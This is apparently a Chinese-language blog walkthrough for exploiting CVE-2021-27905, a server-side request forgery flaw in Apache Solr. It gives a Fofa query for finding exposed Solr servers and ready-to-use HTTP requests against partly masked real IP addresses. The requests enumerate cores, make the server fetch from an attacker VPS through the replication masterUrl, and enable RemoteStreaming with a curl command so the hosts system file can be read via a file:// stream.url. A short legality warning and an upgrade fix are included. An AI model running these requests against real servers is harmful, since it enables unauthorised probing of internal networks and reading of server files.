Apache Solr SSRF漏洞

CVE-2021-27905 服务端请求伪造漏洞

ApacheSolr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

漏洞危害

攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

app='Solr'||app=''Apache-Solr'

一:

获取数据库名字

http://60.xxx.xxx.7:18090/solr/admin/cores?indexInfo=false&wt=json

Apache Solr SSRF漏洞_第1张图片

二 验证  flow要改成你自己的

GET /solr/flow/replication/?command=fetchindex&masterUrl=https://vps:7777 HTTP/1.1
Host: 60.xx.xx.7:18443
Cookie: JSESSIONID=0326C93CCD435FDC8DAECF89842C62A0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh-HK;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Apache Solr SSRF漏洞_第2张图片

三:得到了数据库名之后,我们可以通过修改数据库的配置来开启RemoteStreaming 获取数据

POST /solr/flow/config  HTTP/1.1
Host: 60.xx.xx.7:18090
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=F35BFFC477925CCABFEAFE84CD293AE8
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
Apache Solr SSRF漏洞_第3张图片

或者 
curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://60.xx.xx.7:18090/solr/flow/config

-i查看header头信息

-s 不输出统计信息

-k 使用能忽略证书不受信问题

-X 指定POST请求

-H 添加http请求的标头

-d 用于发送post请求的数据体

http://60.xx.xx.7:18090/solr/flow/debug/dump?param=ContentStreams

stream.url=file:///C:\Windows\System32\drivers\etc\hosts

Apache Solr SSRF漏洞_第4张图片

修复方案

建议受影响的用户升级到最新版本8.8.2

Apache Solr 8.8.2官方下载地址

https://solr.apache.org/downloads.html

注:修复漏洞前请备份资料,并进行充分测试。

你可能感兴趣的:(apache,solr,lucene,安全)